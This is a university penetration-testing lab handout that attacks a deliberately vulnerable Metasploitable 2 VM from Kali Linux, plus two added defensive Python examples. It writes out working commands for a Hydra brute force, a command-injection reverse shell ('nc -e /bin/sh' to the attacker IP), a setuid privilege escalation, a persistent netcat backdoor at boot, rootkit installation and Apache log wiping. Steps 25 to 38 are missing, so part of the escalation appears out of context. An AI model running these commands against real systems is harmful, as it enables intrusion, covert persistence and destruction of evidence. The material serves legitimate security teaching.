SUP'COM - Ecole Supérieure des Communications de Tunis
Master in Data Sciences and New Digital Professions
System and Network Security
Lab 1: Penetration testing with Kali Linux on Metasploitable 2
Pr. Slim REKHIS

I. Lab Objective

The aim of this lab is to experience ethical hacking in a virtual environment composed of two virtual machines: an attacker machine running Kali Linux (an advanced Linux distribution built for penetration testing) and a victim host running Metasploitable 2 (an intentionally vulnerable Ubuntu Linux virtual machine designed for testing common vulnerabilities). In this lab, you will:
- Learn the penetration testing methodology.
- Conduct port scanning and service enumeration on the target host.
- Brute force the login page of a web application.
- Exploit a command injection vulnerability on a vulnerable web server and gain unprivileged access through a reverse shell.
- Escalate privileges and become the root user on the vulnerable machine.
- Install a backdoor on the compromised host to maintain access.
- Hide traces on the victim system by installing and configuring a rootkit.

II. Penetration Testing Methodology

To understand the path that an attacker may follow to target a victim system, we illustrate the steps composing a comprehensive penetration test:
- Step 1: Information Gathering: the attacker invests substantial time and effort in gathering as much information as possible about the target. Information gathering can be passive (collecting information about the target through publicly available sources such as social media and search engines, without making direct contact with the target) or active (using specialized tools such as port scanners that make direct contact with the target system).
- Step 2: Enumeration: after obtaining a preliminary overview of the target, the attacker moves further to learn the exact services running on the target system (including types and versions) and other information such as users, shares and DNS entries. Enumeration prepares a clearer blueprint of the target.
- Step 3: Gaining Access: based on the target blueprint obtained from the two previous phases, it is now time to exploit the vulnerabilities in the target system and gain access. Gaining access to the target system involves exploiting one or many of the vulnerabilities found during the earlier stages and possibly bypassing the security controls deployed in the target system (such as antivirus, firewall, IDS and IPS).
- Step 4: Escalating privilege: quite often, exploiting a vulnerability on the target gives limited access to the system. The aim of this phase is to obtain root-level access to the target. This can be achieved using various techniques to escalate the privileges of the existing user. Once successful, the attacker obtains full control over the system with the highest privileges and can possibly infiltrate deeper into it.
- Step 5: Maintaining access: while a lot of effort has been spent in the previous steps to gain root-level access to the target system, all the work will be in vain if the target system is restarted by the administrator. To avoid this, the attacker needs to make provision for persistent access to the target system, so that restarts of the target system will not affect access. He can install a backdoor to maintain or ease future access.
- Step 6: Covering Tracks: it is quite possible that the previous activities have triggered an alarm on the security systems of the target. The incident response team may already be in action, tracing all the evidence that may lead back to the attacker. The attacker needs to clear all the tools, exploits and backdoors that were uploaded to the target during the compromise.
III. Lab configuration

Two virtual hosts running the Linux operating system are required for this lab. The first is the attacker machine, running Kali Linux (an advanced Linux distribution built for penetration testing). The second is the victim machine, running Metasploitable 2 (an intentionally vulnerable Ubuntu Linux virtual machine designed for testing common vulnerabilities). The network adapters of both machines are attached to a NAT Network, so that they can communicate with each other and reach the outside (main host, local network and Internet).

[Figure: the attacker machine (Kali Linux VM) and the victim machine (Metasploitable 2 VM) attached to the same NAT Network, which is connected to the main host.]

Before configuring the VM adapters, create a NAT Network from the VirtualBox GUI. To do so, open VirtualBox Preferences (File -> Preferences) and go to the Network tab. Then click on the + icon on the right side (Adds new NAT network). Finally, assign the created NAT Network in the adapter configuration of each VM.

IV. Step 1: Information Gathering

1. Start the two VMs and then log in to the attacker machine. From the command line, execute the ifconfig command to determine the IP address/netmask of the attacker machine and netstat -r to determine the address of the gateway. In our case, the IP address of the attacker machine is 10.0.2.7, the IP network address is 10.0.2.0/24 and the gateway IP address is 10.0.2.1.

[Screenshot: ifconfig output on the attacker machine (interface eth0, mtu 1500).]

2. The next step is to start network discovery to find neighboring hosts using the nmap tool.
In the following command, the option -sn takes as input an IP address or a range and checks whether each host is online, by sending Address Resolution Protocol (ARP) requests (if the target subnet is local) or Internet Control Message Protocol (ICMP) requests (if the target subnet is remote).

$ nmap -sn 10.0.2.0/24

[Screenshot: nmap 7.92 host discovery output, ending with "Nmap done: 256 IP addresses (2 hosts up) scanned in 3.17 seconds".]

From the obtained results we notice the existence of a machine having the IP address 10.0.2.5.

3. Having determined the address of the neighboring host, we can scan it to identify its open ports using nmap, choosing the SYN scan technique:

$ sudo nmap -sS 10.0.2.5

[Screenshot: SYN scan output for 10.0.2.5 listing the open TCP ports and their services (such as telnet, rmiregistry, nfs and postgresql), the MAC address of the Oracle VirtualBox virtual NIC, and "Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds".]

From the shown results, there are 23 open ports which may run vulnerable services.

V. Step 2: Enumeration

4. To identify the type and version of the target's operating system (OS) as well as the remote network services running on it, we will conduct another nmap scan, probing the open ports to determine service/version information (-sV) and enabling OS detection (-O):

$ sudo nmap -sV -O 10.0.2.5

[Screenshot: beginning of the service/version scan output for 10.0.2.5.]
[Screenshot (continued): port table with the open services (ftp, telnet, netbios-ssn, microsoft-ds, login, rmiregistry, postgresql and others), the MAC address (Oracle VirtualBox virtual NIC), "Device type: general purpose", "Running: Linux 2.6.X", "OS details: Linux 2.6.9 - 2.6.33", "Network Distance: 1 hop", and "Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds".]

5. Nmap has a special flag to activate aggressive detection, namely -A, which enables OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (--traceroute). This mode sends more probes, making detection by the defender easier, but provides a lot of valuable host information. Execute the aggressive detection using the following command:

$ sudo nmap -A 10.0.2.5

Analyze the obtained results and answer the following questions:
- Which operating system is installed on the target machine?
- What is the target's kernel version?
- What is the target's hostname?
- Check that the HTTP service is running on port 80.
- What is the name and version of the running web server daemon?

6. From the attacker machine, connect to the victim machine on port 80 using the Firefox browser. You will notice the existence of many intentionally vulnerable web applications. In the remaining part we will focus on DVWA (Damn Vulnerable Web Application), a PHP/MySQL web application that intentionally includes security vulnerabilities and is intended for educational purposes. Open the DVWA homepage: the page http://10.0.2.5/dvwa/login.php is displayed and an authentication is required. In the sequel, we will focus on exploiting potential vulnerabilities and weaknesses of this web application to gain access.

[Screenshot: the DVWA login page.]
7. To scan for potential problems and vulnerabilities on the web application, we will use the web vulnerability scanning tool Nikto:

$ nikto -h http://10.0.2.5/dvwa

[Screenshot: Nikto output for http://10.0.2.5/dvwa; the highlighted entry reports that /dvwa/CHANGELOG.txt is accessible and reveals potentially sensitive information.]

A lot of vulnerabilities exist as the web application is deliberately vulnerable. The selected entry in the above figure shows the existence of an accessible modification history file (CHANGELOG.txt).

8. From the attacker machine, open the CHANGELOG.txt file in the browser using the following URL:

http://10.0.2.5/dvwa/CHANGELOG.txt

A quick reading of its content shows the existence of the admin user.

[Screenshot: beginning of CHANGELOG.txt ("Change Log v1.0.1": implemented different security levels, changed XSS from POST to GET, updated login script to use database, combined RFI + LFI to make "File Inclusion", better error output on upload script, and other entries dated May 2009).]

VI. Step 3: Gaining Access

9. In the following steps we will try to brute force the login page by looking for the password corresponding to the username admin that we found in the previous step.
10. To brute force the login webpage we will use the Hydra tool, but we first need to provide the following data:
- Login or wordlist for usernames (we know the username, which is admin)
- Password or wordlist for passwords (we will use the wordlist /usr/share/wordlists/rockyou.txt.gz)
- IP address or hostname (we know that the IP address is 10.0.2.5)
- HTTP method (POST/GET)
- Directory/path to the login page (we have noticed that it is /dvwa/login.php)
- Request body for username/password
- A way to identify failed attempts

To determine the three remaining pieces of information (the items highlighted in gray), we will head back into the browser, right-click, and choose Inspect Element. A window should pop up at the bottom of the page. Select the Network tab.

[Screenshot: the browser developer tools opened on the DVWA login page, Network tab selected.]

To see what happens if we attempt a login, type admin as username, choose a random password, and then click Login. Of course, this login attempt will fail, but it can be seen (by looking at the requests) that this website is using the POST method to log in.

[Screenshot: the Network tab showing the POST request sent to login.php.]

11. To find and specify the location of the username/password form fields, click on Edit and Resend. In our case the request body looks like this:

username=admin&password=test&Login=Login

[Screenshot: the Edit and Resend view showing the request body.]

12. Copy the request body for username/password and replace the entered random password (equal to test in our example) with ^PASS^. This will tell Hydra to enter the words from our list at this position of the request. Therefore, the modified request body that we will place into the Hydra command is:

username=admin&password=^PASS^&Login=Login

Note that, if required, we could also brute-force usernames by specifying ^USER^ instead of admin.

13. Now we need to let Hydra know how to detect whether it successfully logged in during the brute-force attempts.
Therefore, we will specify what the page looks like on a failed login. As we saw before, the webpage shows the text "Login failed" if the login/password is wrong. We will copy this text and paste it into our command.

[Screenshot: the DVWA login page showing the "Login failed" message.]

14. After identifying all required components, we will place them into a single command of this form:

sudo hydra -l <username> -P <password wordlist> <IP address> http-post-form "<login page path>:<request body>:<failed-login string>"

After filling in the placeholders, we obtain the following command to execute:

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 10.0.2.5 http-post-form "/dvwa/login.php:username=admin&password=^PASS^&Login=Login:Login failed"

[Screenshot: Hydra output; it reports "1 of 1 target successfully completed, 1 valid password found".]

After a few seconds, we uncover the login/password to sign in: admin/password

15. Now log in to DVWA, go to DVWA Security and set the website security level to low.

[Screenshot: the DVWA Security page.]

16. Go to the Command Execution page, enter the IP address 8.8.8.8, and then click on submit. You will see the output of the ping command.

[Screenshot: the "Vulnerability: Command Execution" page ("Ping for FREE") with the ping output.]

You have certainly noticed that whenever a user enters an IP address, the web server executes it using the command:

ping -c 3 8.8.8.8

17. In Linux, it is possible to run multiple commands in one line using a command separator (the semicolon ;).
Try to check for the existence of a command injection vulnerability by typing:

8.8.8.8; ls -l

[Screenshot: the Command Execution page showing the ping output followed by a directory listing.]

As you can see, the command injection payload was successfully executed and the output of the command was shown.

18. Determine the username used to run the web service on the victim machine, and its UID and GID. To do so, you can remotely inject the commands whoami and id.

19. Before moving to the next actions, let's check the source code of the web application to understand the vulnerability. At the bottom of the webpage click on the View Source button.

[Screenshot: the Command Execution source code.]

You can notice that the code does not check whether the variable $target matches an IP address. Specifically, there is no filtering of special characters such as | ; & which allows the attacker to append commands after the IP address. A command injection payload can be framed as follows:
- cmd1 ; cmd2    Run cmd1 and then cmd2, regardless of the success of cmd1.
- cmd1 | cmd2    Regardless of the output of cmd1, cmd2 will try to run.
- cmd1 && cmd2   Run cmd2 if cmd1 succeeded.
- cmd1 || cmd2   Run cmd2 if cmd1 failed.

20. To make it easy to inject commands on the victim system, while avoiding the use of the vulnerable web application each time, we will try to obtain a reverse shell on the victim machine (a reverse shell is a shell session established over a connection that is initiated from the remote victim machine, not from the attacker's machine). To do so, one of the easiest methods is based on the use of netcat (command-line tool nc). The latter is often referred to as a Swiss Army knife utility, as it can be used for port scanning, port listening, file transfer, banner grabbing, redirection and backdoor creation. On the attacker machine, open a shell window and type the following command to start a listener on port 1234:

$ nc -vv -l -p 1234

Where:
-vv      verbose, to show any output.
-l       to start listening.
-p 1234  the port on which the program will listen.

[Screenshot: "nc -vv -l -p 1234" on the attacker machine, reporting "listening on [any] 1234 ...".]

21. Go to the DVWA command injection tab and enter the IP address and the nc command using a separator:

8.8.8.8; nc -e /bin/sh 10.0.2.7 1234

Where:
-e /bin/sh  the file which we want to execute after a successful connection (all the commands that will be injected on port 1234 will be executed using this shell).
10.0.2.7    the IP address of the attacker's machine where the listener is running.
1234        the port on which the listener is listening.

On the attacker machine you should see a notification message showing a successful connection from the victim machine 10.0.2.5 to the attacker machine 10.0.2.7.

[Screenshot: the listener reports "10.0.2.5: inverse host lookup failed: Unknown host" followed by "connect to [10.0.2.7] from (UNKNOWN) [10.0.2.5] 32996".]

22. From the attacker machine, type some commands in the opened reverse shell window to collect data about the victim host:
- uname -a        to print information about the kernel name and version
- lsb_release -a  to obtain information about the distribution and release
- whoami          to print the current username that is running the commands
- id              to print the current user and group id
- pwd             to print the current working directory

What is the system distribution and kernel version of the victim host? What is the user executing the shell commands?

23. To prove that the user lacks sufficient privileges, you can run the following command in the reverse shell window and notice its failure (no result is displayed):

cat /etc/shadow

[Screenshot: the reverse shell session; cat /etc/shadow prints nothing.]

Therefore, it becomes necessary to find a local vulnerability to escalate privileges and get root access.
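The weakness described in step 19 and used in steps 17, 20 and 21 comes down to the submitted value being pasted into a shell command line without validation. The following Python code is an added example, not part of this lab handout or of DVWA: it places a command string built the vulnerable way next to a hardened form that accepts only a dotted-quad IPv4 address and hands it to ping as a separate argument, so no shell ever parses the input. The function names (vulnerable_ping_command, injected_separators, safe_ping_argv, is_rejected, safe_ping) and the sample inputs are my own.

```python
"""Added example (not from the lab handout): the DVWA ping form's flaw and a
hardened counterpart.  Function names and sample inputs are constructed."""
import ipaddress
import subprocess

# The separators listed in step 19 (two-character tokens are checked first so
# that "||" is not reported as two "|" and "&&" not as two "&").
SHELL_SEPARATORS = ("||", "&&", ";", "|", "&")


def vulnerable_ping_command(target):
    """Mirrors the flaw of step 19: the submitted value is glued into a shell
    command line, so anything after a separator becomes a second command."""
    return "ping -c 3 " + target


def injected_separators(target):
    """Name the command separators present in a submitted value, in the order
    found; useful for logging and alerting on rejected input."""
    found = []
    rest = target
    for sep in SHELL_SEPARATORS:
        if sep in rest:
            found.append(sep)
            rest = rest.replace(sep, " ")
    return found


def is_ipv4(target):
    """True only for a syntactically valid dotted-quad IPv4 address."""
    try:
        ipaddress.IPv4Address(target)
    except ValueError:
        return False
    return True


def safe_ping_argv(target):
    """Hardened form: reject anything that is not an IPv4 address, then build an
    argument vector in which the address is a single argv element."""
    if not is_ipv4(target):
        raise ValueError("not an IPv4 address: %r" % target)
    return ["ping", "-c", "3", target]


def is_rejected(target):
    """True when the hardened form refuses the value."""
    try:
        safe_ping_argv(target)
    except ValueError:
        return True
    return False


def safe_ping(target):
    """Run the hardened command without a shell (shell=False is the default, so
    argv elements are never re-parsed) and return ping's standard output."""
    result = subprocess.run(safe_ping_argv(target), capture_output=True,
                            text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for value in ("8.8.8.8", "8.8.8.8; ls -l", "8.8.8.8 && id", "8.8.8.8 | id"):
        print(repr(value))
        print("  vulnerable command line:", vulnerable_ping_command(value))
        print("  separators found:", injected_separators(value))
        print("  hardened form rejects it:", is_rejected(value))
```

The validation is deliberately a whitelist (a parsed IPv4 address) rather than a blacklist of the four separators: backticks, $(), newlines and other shell metacharacters are rejected by the same check without having to be enumerated.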
[Screenshot: output of the commands of steps 22 and 23 in the reverse shell. uname -a reports "Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux"; lsb_release -a reports Distributor ID: Ubuntu, Release: 8.04, Codename: hardy; whoami reports www-data; pwd reports /var/www/dvwa/vulnerabilities/exec.]

VII. Step 4: Escalating privilege

24. To search for an exploit for the found kernel version 2.6.24 running on Ubuntu 8.04, several ways can be followed, including but not limited to:
- searching with the open-source tool searchsploit installed on Kali;
- searching on the exploit-db.com website;
- searching with the Google search engine.

Searchsploit provides a database which contains various exploits at the kernel level, system level and application level. You can execute the following command to search for privilege escalation exploits:

$ searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6

[Screenshot: searchsploit results listing Linux kernel local privilege escalation exploits for 2.6 kernels, with their paths under linux/local/.]
echo "#!/bin/bash" > /tmp/run
echo "cp /bin/sh /bin/myshell" >> /tmp/run
echo "chmod +s /bin/myshell" >> /tmp/run

Then display the content of the created file /tmp/run:

cat /tmp/run

[Screenshot: the three echo commands followed by cat /tmp/run, which prints "#!/bin/bash", "cp /bin/sh /bin/myshell" and "chmod +s /bin/myshell"; a ps line shows the running "/sbin/udevd --daemon" process.]

Execute the exploit file with the pid of Netlink (2411 in our case) as a parameter:

./exploit 2411

Check that the file /bin/myshell has been created, is owned by root, is executable by all users, and has the setuid attribute:

ls -al /bin/myshell

[Screenshot: ./exploit 2411 followed by ls -al /bin/myshell, which shows a setuid file owned by root dated May 1 17:48.]

Run the copied suid shell with the option -p (without the option -p, bash will revert the effective gid and uid to the real gid and uid):

/bin/myshell -p

Check that the privilege has been escalated by executing the id and whoami commands.

[Screenshot: id reports uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=33(www-data).]

VIII. Step 5: Maintaining access

39. To maintain access to the victim machine and remain able to connect to it even when the system restarts, we will create a persistent backdoor, again using the netcat tool, by making the victim persistently listen on port 5005 and granting control to the attacker via a bash shell. Using the opened reverse shell, execute the following commands to create the listener script file (listener.sh) that will be automatically executed at system startup:

echo "#!/bin/bash" > /etc/init.d/listener.sh
echo "(while true; do nc -l -v -p 5005 -e /bin/bash; done) &" >> /etc/init.d/listener.sh

Note that, by default, netcat does not create a persistent connection. That is why we need to run it in a while loop if we want to connect to it more than once. Otherwise, the program will close after the first connection.
40. Make the script file executable:

chmod +x /etc/init.d/listener.sh

41. Display the attributes and content of the created file listener.sh:

ls -al /etc/init.d/listener.sh
cat /etc/init.d/listener.sh

[Screenshot: ls -al shows "-rwxr-xr-x 1 root root 67 May 4 10:24 /etc/init.d/listener.sh"; cat shows "#!/bin/bash" and "(while true; do nc -l -v -p 5005 -e /bin/bash; done) &".]

42. Execute the created script and then check that the victim machine is now listening on port 5005:

/etc/init.d/listener.sh
netstat -taun | grep 5005

[Screenshot: netstat reports "tcp 0 0 0.0.0.0:5005 0.0.0.0:* LISTEN".]

43. On the attacker machine open a new shell window, then connect to the victim host (IP: 10.0.2.5; port: 5005), and check that root access has been granted (since the listener.sh script is executed during system startup with the root privilege):

$ nc 10.0.2.5 5005

[Screenshot: after "nc 10.0.2.5 5005", the id command reports uid=0(root) gid=0(root).]

In the remaining part, we will use this new shell window to remotely execute commands on the victim machine.

44. Using the same window, configure listener.sh to be executed at system startup (all runlevels):

update-rc.d listener.sh defaults

[Screenshot: update-rc.d reports "Adding system startup for /etc/init.d/listener.sh" and creates the symbolic links /etc/rc0.d/K20listener.sh, /etc/rc1.d/K20listener.sh, /etc/rc6.d/K20listener.sh, /etc/rc2.d/S20listener.sh, /etc/rc3.d/S20listener.sh, /etc/rc4.d/S20listener.sh and /etc/rc5.d/S20listener.sh, all pointing to ../init.d/listener.sh.]

45. List the services/daemons configured to start at boot (runlevel 3) and their order using the following command (the names of the obtained files may differ on your machine depending on the services already configured):

ls -x /etc/rc3.d
[Screenshot: listing of /etc/rc3.d, including README, S10sysklogd, S11klogd, S16ssh, S17portmap, S19mysql, S20listener.sh (highlighted), S20nfs-common, S20nfs-kernel-server, S20openbsd-inetd, S20rsync, S20samba, S20xinetd, S50proftpd, S89cron, S91apache2, S99rc.local and S99rmnologin.]

46. Execute the command reboot to restart the victim machine. Then check that the backdoor has started listening on port 5005 by trying to connect to it again on port 5005 from the attacker machine.

IX. Step 6: Covering Tracks

The above executed actions have left many traces on the compromised system, including the script file listener.sh stored in /etc/init.d/listener.sh; the opened port 5005 and the upcoming TCP connection from the attacker's host established on it; and the running process related to the started service daemon (in our case /etc/rc3.d/S20listener.sh). All these traces can easily be detected by security analysts on the compromised system using Linux commands: ps, find, ls, netstat, etc. The aim of this step is to hide these traces by installing a rootkit.

47. Remotely execute this command on the victim machine to observe the already available traces about the running backdoor:

netstat -taun | grep 5005

[Screenshot: netstat output showing port 5005 listening and the established connection.]

48. To hide these traces, we will install a rootkit from the Packet Storm website (an information security website offering current and historical computer security tools, exploits and security advisories) on the victim's machine. First, we will download the rootkit file (from the Internet) on the attacker's host (under the directory /home/kalilinux/Downloads):

$ cd /home/kalilinux/Downloads
$ wget https://dl.packetstormsecurity.net/UNIX/penetration/rootkits/fk.tgz

[Screenshot: wget downloads fk.tgz and reports "'fk.tgz' saved".]
49. On the attacker's machine, create a symbolic link to the rootkit file in the web server's document directory of the attacker machine, so that you can transfer it via HTTP to the victim's host:

$ sudo ln -s /home/kalilinux/Downloads/fk.tgz /var/www/html

50. Go back to the last opened remote shell window (on the victim machine, port 5005). Change directory to /tmp and download the rootkit file from the attacker's machine. Then verify that the rootkit has been successfully downloaded and extract it on the victim host:

cd /tmp
wget http://10.0.2.7/fk.tgz
ls -al fk.tgz
tar zxvf fk.tgz

[Screenshot: ls -al shows fk.tgz owned by root, dated Sep 29 2002; tar extracts the fk-0.4/ directory (fk-0.4/CHANGES, fk-0.4/init and other files).]

51. As a rootkit installation will cause serious irreversible damage to the operating system of the victim machine, you should take a snapshot of the Metasploitable VM before continuing, so that you can reverse the changes if any problem occurs.

52. Move to the fk-0.4 directory and display the content of the README file to identify the files that need to be configured to hide ports and programs on the victim host:

cd fk-0.4
cat README

[Screenshot: README excerpt. The configuration files are in /dev/proc/fuckit/config/; the rootkit can be configured manually or with a tool provided in that directory. The configuration files include the hidden local ports, the hidden remote ports you are often connecting to, the program names not to be shown in "ps" and "top", and the backdoor password.]

53. Run the installation script using the following command:

./install

[Screenshot: installer output, noting that this version does not include a logcleaner.]

54. In the terminal window, enter this command to display the list of active connections and the associated ports and IP addresses:

netstat --protocol=inet

[Screenshot: "Active Internet connections (w/o servers)" with the columns Proto, Recv-Q, Send-Q, Local Address, Foreign Address and State.]
[Screenshot (continued): an ESTABLISHED tcp connection between the local address 10.0.2.5:5005 and the foreign address 10.0.2.7:38264.]

You can observe from this figure that the victim's host (10.0.2.5), listening on port 5005, is connected to the attacker's machine (10.0.2.7) on port 38264. Configure the rootkit to avoid displaying the locally opened port 5005 (used to run the backdoor) on the victim host. Then check that it no longer appears in the list of listening ports:

echo "5005" > /dev/proc/fuckit/config/lports
netstat -taunp | grep 5005

[Screenshot: after the configuration, netstat no longer lists port 5005.]

55. Remove the files left in the /tmp folder of the victim host:

cd /tmp
rm fk.tgz

56. Several traces were left in the access and error logs of the victim's web server, especially the files /var/log/apache2/access.log and /var/log/apache2/error.log. You can check their content using the commands:

cat /var/log/apache2/access.log
cat /var/log/apache2/error.log

Execute the following commands to clear them:

echo > /var/log/apache2/access.log
echo > /var/log/apache2/error.log

Then verify that all records were successfully deleted:

cat /var/log/apache2/access.log
cat /var/log/apache2/error.log
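Step 6 lists the traces this lab leaves behind (the listener.sh script in /etc/init.d, the listening port 5005 and its process) and says an analyst finds them with ps, find, ls and netstat; step 56 adds the entries that the Hydra run of step 14 leaves in the Apache access log. The following Python code is an added example, not part of the lab handout: it runs three such checks over constructed sample data (two init scripts, a few netstat -taun lines and Apache access-log lines). The function names, the detection threshold and all sample data are my own.

```python
"""Added example (not from the lab handout): defender-side checks for the traces
left by steps 3, 5 and 6.  Every sample below is constructed for this example."""
import re
from collections import Counter

# Constructed: contents of two init scripts as read from /etc/init.d
INIT_SCRIPTS = {
    "/etc/init.d/listener.sh": (
        "#!/bin/bash\n"
        "(while true; do nc -l -v -p 5005 -e /bin/bash; done) &\n"
    ),
    "/etc/init.d/rsync": (
        "#!/bin/sh\n"
        "# rsync daemon init script (benign)\n"
        "[ -x /usr/bin/rsync ] || exit 0\n"
    ),
}

# Constructed: lines in the layout of `netstat -taun` on the victim
NETSTAT_LINES = [
    "tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN",
    "tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN",
    "tcp        0      0 0.0.0.0:5005            0.0.0.0:*               LISTEN",
    "tcp        0      0 10.0.2.5:5005           10.0.2.7:38264          ESTABLISHED",
    "udp        0      0 0.0.0.0:111             0.0.0.0:*",
]

# Constructed: Apache combined-log lines; a password-guessing run shows up as
# many POSTs to the login page from one source address
ACCESS_LOG = [
    '10.0.2.7 - - [15/May/2022:09:26:48 -0500] "POST /dvwa/login.php HTTP/1.0" 200 1289 "-" "Mozilla/4.0"'
] * 25 + [
    '10.0.2.9 - - [15/May/2022:09:30:01 -0500] "GET /dvwa/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
]

NETCAT_NAMES = {"nc", "netcat", "ncat"}


def find_bind_shell_scripts(scripts):
    """Return (path, line number, line) for every script line that starts a
    netcat listener (-l) attached to a program (-e): the shape of listener.sh."""
    hits = []
    for path, text in scripts.items():
        for number, line in enumerate(text.splitlines(), start=1):
            tokens = line.split()
            if NETCAT_NAMES & set(tokens) and "-l" in tokens and "-e" in tokens:
                hits.append((path, number, line.strip()))
    return hits


def unexpected_listeners(netstat_lines, expected_ports):
    """Return the TCP ports in LISTEN state that are not on the allowlist."""
    ports = set()
    for line in netstat_lines:
        fields = line.split()
        if fields and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            port = int(fields[3].rsplit(":", 1)[1])   # local address is field 4
            if port not in expected_ports:
                ports.add(port)
    return sorted(ports)


# source, ident, user, [timestamp], "METHOD path protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def login_bursts(log_lines, login_path="/dvwa/login.php", threshold=10):
    """Count POSTs to the login page per source address and return the sources
    at or above the threshold (the threshold value is an arbitrary choice)."""
    counts = Counter()
    for line in log_lines:
        match = LOG_RE.match(line)
        if match and match.group(2) == "POST" and match.group(3) == login_path:
            counts[match.group(1)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("listener scripts:", find_bind_shell_scripts(INIT_SCRIPTS))
    print("unexpected listening ports:", unexpected_listeners(NETSTAT_LINES, {22, 80}))
    print("login bursts:", login_bursts(ACCESS_LOG))
```

After step 54 the rootkit hides port 5005 from netstat on the victim, so the netstat-based check is blind on a compromised host; the listener still answers a port scan run from another machine, and the init script with its rc*.d symlinks stays on disk, which is why the file-based check is kept separate from the socket-based one.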
